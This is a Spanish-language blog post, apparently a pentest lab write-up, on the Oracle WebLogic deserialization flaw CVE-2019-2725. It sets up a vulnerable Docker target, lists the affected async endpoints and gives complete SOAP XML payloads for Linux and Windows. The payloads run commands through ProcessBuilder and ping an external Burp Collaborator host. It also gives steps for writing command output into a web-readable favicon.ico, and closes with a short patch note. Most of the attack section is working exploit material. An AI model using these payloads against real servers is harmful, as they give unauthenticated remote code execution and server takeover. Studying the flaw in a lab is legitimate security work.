Mostrando entradas con la etiqueta CVE-2019-2725. Mostrar todas las entradas
Mostrando entradas con la etiqueta CVE-2019-2725. Mostrar todas las entradas

jueves, 9 de mayo de 2019

WebLogic CVE-2019-2725/CNVD-C-2019-48814


Instalación de maquina vulnerable:

 1.- sudo docker pull vulhub/weblogic

2.- sudo docker run -dit -p 7001:7001 vulhub/weblogic

 Descripcion:

 Oracle WebLogic Server es un middleware para implementar y administrar aplicaciones web. Un atacante podría enviar una solicitud a un servidor WebLogic, que luego se comunicaría con un host malicioso para completar la solicitud, abriendo el servidor WebLogic a un ataque RCE.

 Impacto:

 Los ataques exitosos de esta vulnerabilidad pueden resultar en la toma de control de Oracle WebLogic Server.

 URLs Posibles:

 /_async/AsyncResponseService
/_async/AsyncResponseServiceHttps

/_async/AsyncResponseServiceJms

 Vector de ataque para Linux:

 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
        <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>ping xxx.burpcollaborator.net</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>

 Vector de ataque para windows:

 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
        <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>cmd</string>
        </void>
        <void index="1">
        <string>/c</string>
        </void>
        <void index="2">
        <string>ping xxx.burpcollaborator.net</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>
Pasos a Realizar:

 Se ejecutaron pruebas de seguridad con los dos vectores de ataques para windows y linux en todos los puntos finales (URLs posibles) posibles en la aplicacion.

 1.- Enviar los payloads a todos los posibles puntos finales de la aplicacion y ver si burp collaborator atrapa el ping enviado.


2.- En caso de responder y ser vulnerable, utilizar el siguiente comando entre <string>tucomando</string>
ls -la > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico

3.- Accedemos a la siguiente ruta: http://HOSTVULNERABLE/_async/favicon.ico

Solución:
Actualizar para aplicar el parche de esta vulnerabilidad.
Publicado por en 2 comentarios:
Etiquetas: , ,
Suscribirse a: Entradas (Atom)